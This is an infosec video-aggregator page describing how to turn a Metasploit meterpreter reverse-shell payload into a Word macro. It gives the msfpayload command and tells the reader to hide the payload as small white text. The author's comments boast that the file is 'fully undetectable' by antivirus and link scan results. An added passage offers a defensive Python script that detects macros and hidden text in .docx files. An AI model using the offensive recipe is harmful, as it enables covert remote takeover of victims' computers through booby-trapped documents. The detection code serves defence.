Description: Hello guys, today I thought of making a small tutorial on using Metasploit payloads as macros and using them effectively inside Word, Excel and Access documents. As when creating a normal Metasploit backdoor executable with msfpayload, just give the 'V' option, with which msfpayload generates the payload in VBScript. In this case I will use a reverse connection because I love it :)
msfpayload windows/meterpreter/reverse_tcp LHOST= [Your local Host] LPORT= [Your Local Port] V > Shell.txt
Now create a new Word file, go to View > Macros, type a random name and create a new macro. Next, open our VBScript, which is Shell.txt, copy the top part of the file into the Visual Basic editor and save it. The top part is the part that provides the functions required to execute our payload. After that, copy the payload part into the document; you may make the font size small and change the color to white to make it non-suspicious. Use multi/handler, which handles exploits outside the framework, to listen. That's it: if everything is configured correctly, you should get a nice reverse connection back to you once the file is opened. We can also convert any executable to VBS using exe2vbs.rb, located at /pentest/exploits/framework/tools/. You can imagine, beyond this scope, how we can infect, and I think more ideas may have occurred to you ;). I hope you learnt something.
Thank You.
Email: unownsec[at]gmail[dot]com
Follow @UnownSec
Un0wn_X
Tags: Macros, VBScript, Metasploit
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
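For anyone reviewing documents built this way, a triage check that flags the two artefacts the description relies on: a VBA macro project in the file, and payload text hidden as white or very small type. This is an added example, not part of the original video or post; it assumes an OOXML package (.docx/.docm), and the function names, thresholds and sample document are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
MAX_HALF_POINTS = 8      # assumed threshold: 4 pt or smaller counts as tiny
MIN_HIDDEN_CHARS = 40    # assumed threshold: ignore short stray runs

def triage_docx(data: bytes) -> dict:
    """Return macro and hidden-text findings for an OOXML Word package."""
    findings = {"has_vba_project": False, "hidden_runs": []}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = pkg.namelist()
        # Macro-enabled packages carry the VBA project as a vbaProject.bin part.
        findings["has_vba_project"] = any(
            n.lower().endswith("vbaproject.bin") for n in names)
        if "word/document.xml" not in names:
            return findings
        root = ET.fromstring(pkg.read("word/document.xml"))
    for run in root.iter(W + "r"):
        text = "".join(t.text or "" for t in run.iter(W + "t"))
        props = run.find(W + "rPr")
        if props is None or len(text) < MIN_HIDDEN_CHARS:
            continue
        color = props.find(W + "color")
        size = props.find(W + "sz")
        white = color is not None and color.get(W + "val", "").upper() == "FFFFFF"
        size_val = size.get(W + "val", "") if size is not None else ""
        tiny = size_val.isdigit() and int(size_val) <= MAX_HALF_POINTS
        if white or tiny:
            findings["hidden_runs"].append({"white": white, "tiny": tiny, "chars": len(text)})
    return findings

def build_sample() -> bytes:
    """Constructed test package: one visible run and one white 1 pt run."""
    ns = 'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
    body = (f'<w:document {ns}><w:body><w:p>'
            '<w:r><w:t>Quarterly report</w:t></w:r>'
            '<w:r><w:rPr><w:color w:val="FFFFFF"/><w:sz w:val="2"/></w:rPr>'
            f'<w:t>{"A" * 200}</w:t></w:r>'
            '</w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", body)
        z.writestr("word/vbaProject.bin", b"placeholder, not a real VBA project")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_docx(build_sample()))
```

Only direct run formatting is inspected; colour or size applied through a style, and legacy binary .doc files, need a separate parser.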
Nicely done! Given this technique has been around, do AVs or MS Security Essentials detect it? Did you try running in presence of AV?
Good Job..!
Nice video!
Have you tested this file against AVs?
@SecurityTube_BOT yes the file is FUD indeed ... I will test this against AVs while in execution today and let you know guys...
Thanks for the comments
@Alone yes the file is FUD http://vscan.novirusthanks.org/analysis/f77e8bc3995c547e531b0f6c7c399f4e/aS1sb3ZlLXlhLXNvLW11Y2gtZG9jeA==/
http://virusscan.jotti.org/en/scanresult/5a0d41d57fe90f1cf132c46202a0ef07a6beeeed
http://r.virscan.org/report/1288deb25d2e06ff2f43cd968ff8bf5e.html